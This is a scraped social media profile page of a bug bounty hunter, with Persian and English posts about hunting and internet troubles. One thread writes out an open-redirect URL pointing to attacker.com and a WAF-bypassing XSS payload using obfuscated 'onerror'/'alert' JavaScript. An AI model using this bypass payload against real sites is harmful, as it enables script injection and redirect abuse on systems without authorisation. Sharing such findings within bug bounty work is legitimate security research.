sw-Amin

78 posts

sw-Amin banner
sw-Amin

sw-Amin

@sw_4min

localhost Katılım Ocak 2025
195 Takip Edilen151 Takipçiler
sw-Amin
sw-Amin@sw_4min·
@MikeApt76 همینطوره داداشم... امیدوار یه یه روز بهتر
فارسی
0
0
1
22
Stoikiy Muzhik
Stoikiy Muzhik@MikeApt76·
@sw_4min خدایی دارم دیوونه میشم از این وضعیت. این همه تلاش و پشتکار و استمرار و می‌ترسم همه‌ی اینا هیچ بشه.
فارسی
1
0
1
38
Stoikiy Muzhik
Stoikiy Muzhik@MikeApt76·
دوستان هانتر ( باگ بانتی ) یه سوال: با این اینترنت داغون می‌تونید هانت کنید؟ الان یک ماهه که من نتونستم هانت کنم و این داره منو دیوونه می‌کنه. تا میرم رو تارگت و تا بشینم هانت کنم اصلا صفحه‌ load نمیشه 😑 هکروان رو هم که چی بگم!
فارسی
1
0
6
319
sw-Amin
sw-Amin@sw_4min·
@voorivex شرکت پیام پرداز پیام از گروه خارج شد😂
فارسی
0
0
5
889
 یاشو
 یاشو@voorivex·
فامیلیمو حداقل درست می‌نوشتی
 یاشو tweet media
فارسی
40
0
236
12.5K
Ho3ein
Ho3ein@0xHo3ein0xploit·
Forever grateful for GUTS Course 📿 @voorivex
Ho3ein tweet media
English
21
4
234
7.5K
sw-Amin
sw-Amin@sw_4min·
Final payload to bypass the WAF : /Path?reurl=javascript:var{x:onerror}%3d{x%3a%2561lert}%3bthrow%20origin//a.company.‌com [2/2] #xssbypass #bugbounty
sw-Amin tweet media
English
2
0
13
388
sw-Amin
sw-Amin@sw_4min·
[Bypass Cloudflare] Open Redirect to XSS I happened to run into this today Open Redirect: /Path?reurl=https‌://attacker.com%23a.‌company.c‌om ->redirect to attacker‌.com Escalate to xss: /Path?reurl=javascript:alert(origin) ->blocked by WAF [1/2]
English
6
1
15
1.2K
sw-Amin retweetledi
Neet
Neet@neet_sol·
Yo @LinkedIn fuck u
Neet tweet media
English
21
33
480
12.1K
Intigriti
Intigriti@intigriti·
What was your first critical bug? 😎
English
32
0
72
12.8K
Intigriti
Intigriti@intigriti·
What's the easiest vulnerability type to find in 2025? 👀
English
18
0
66
12.3K
ER
ER@ER_eton·
دوستان بجز منیزیم و امگا ۳ و ویتامین دی، چی پیشنهاد میدین برای بی حالی و بی حوصلگی؟!
فارسی
1.4K
28
3.6K
283K
Ho3ein
Ho3ein@0xHo3ein0xploit·
Still hunting, Still learning JS Just got a little more interesting today📿 @voorivex
Ho3ein tweet media
English
22
3
287
10.4K
nader abdi
nader abdi@AtaTurk1925·
قراره تو یه ایونت، تجربه‌هامون از هانت کردن روی متا(فیسبوک، اینستاگرام،...) و تکنولوژی‌هایی که متا استفاده می‌کنه ابزار های که توسعه داده شده رو باهاتون به اشتراک بذاریم! زمان لایو برا هفته آینده اس تایم دقیق هم خود چنل میذاریم. 📺 سه تا لایو داریم که با @p__oria ❤️ به‌صورت مشترک برگزار می‌شه. اگه دوست دارین تو لایوها شرکت کنین، فقط کافیه جوین سرور دیسکورد بدین link: discord.gg/gRgv3MBBv6
nader abdi tweet media
فارسی
34
29
218
27.6K
Safa Safari
Safa Safari@safasafari3·
با تفنگ اسباب بازی میخواد منو بزنه آخییی =)))
Safa Safari tweet media
فارسی
5
0
41
2.5K
YS
YS@YShahinzadeh·
This one was easy: searched JS files → revealing endpoints → JSON HTTP request → exposed PII. Tip: account for lazy-loading. many hunters miss endpoints. Method: click to trigger lazy-loaded JS, then search again for endpoints. Happy hunting :]
YS tweet media
English
22
58
801
46K
Josefcfc
Josefcfc@yousefccfc·
1-click ATO via a postMessage flaw This is my 2nd ever finding and I’m really happy about it! The severity could be high, but I’m not letting that overshadow the joy of this bounty 😄 Huge thanks to @voorivex for teaching us this trick 🙌
Josefcfc tweet media
English
25
5
231
9.1K